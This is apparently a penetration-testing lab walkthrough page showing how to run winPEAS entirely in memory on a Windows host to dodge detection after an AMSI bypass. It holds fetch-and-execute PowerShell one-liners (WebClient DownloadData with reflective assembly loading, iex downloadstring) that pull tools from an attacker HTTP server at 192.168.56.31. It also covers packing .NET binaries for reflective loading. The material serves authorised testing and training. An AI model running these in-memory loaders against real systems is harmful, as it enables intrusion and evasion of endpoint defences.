winPeas without touching disk

My favorite tools to look for privilege escalation is without a doubt winpeas
We already bypass amsi on the previous step, what we can do now to avoid detection is put winpeas on an http server and load it in memory
This article explain very well how to load and run an assembly with powershell full in memory.

cd /var/www/html
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe
python3 -m http.server 8080

And play winPeas from memory with the following powershell commands (As winPeas is in .net we load the assembly and run it directly) :

$data=(New-Object System.Net.WebClient).DownloadData('http://192.168.56.31:8080/winPEASany_ofs.exe');
$asm = [System.Reflection.Assembly]::Load([byte[]]$data);
$out = [Console]::Out;$sWriter = New-Object IO.StringWriter;[Console]::SetOut($sWriter);
[winPEAS.Program]::Main("");[Console]::SetOut($out);$sWriter.ToString()

WinPeas take several minutes to complete and give the prompt back with all the info (without the capture of the console out the output is empty in our basic powershell reverseshell, if you got a “real” shell you don’t have to do that and just launch the [winPEAS.Program]::Main(""); without the console stuff, thanks to PowerSharpPack code for the trick)
If you don’t want to be bored to compile .net app or modify them with public class and method and no exit.environment you can also use PowerSharpPack and get everything done for you (thanks again to @ShitSecure).

iex(new-object net.webclient).downloadstring('http://192.168.56.31:8080/PowerSharpPack/PowerSharpPack.ps1')
PowerSharpPack -winPEAS

And we get the information of SEImpersonate Privilege to use for escalation

Packing your .net binary for powershell

If you don’t want to use binary from internet (and you should don’t use pre-compiled code grabbed on github on your pentest mission), you can also pack you own binary with the following script : EncodeAssembly.ps1
This script is a modification of the one from @snovvcrash website and some code of PowerSharpPack.
Pack with the following commands :

. .\EncodeAssembly.ps1
Invoke-EncodeAssembly -binaryPath winPEAS.exe -namespace winPEAS -capture $true

To be use as reflective assembly in powershell remember you should avoid environment.exit() in the .net code and also you must set the class and the main method public.

PreviousPrivesc SeImpersonatePrivilege NextSeImpersonatePrivilege to Authority\system

Last updated 1 year ago

$data=(New-Object System.Net.WebClient).DownloadData('http://192.168.56.31:8080/winPEASany_ofs.exe'); $asm = [System.Reflection.Assembly]::Load([byte[]]$data); $out = [Console]::Out;$sWriter = New-Object IO.StringWriter;[Console]::SetOut($sWriter); [winPEAS.Program]::Main("");[Console]::SetOut($out);$sWriter.ToString()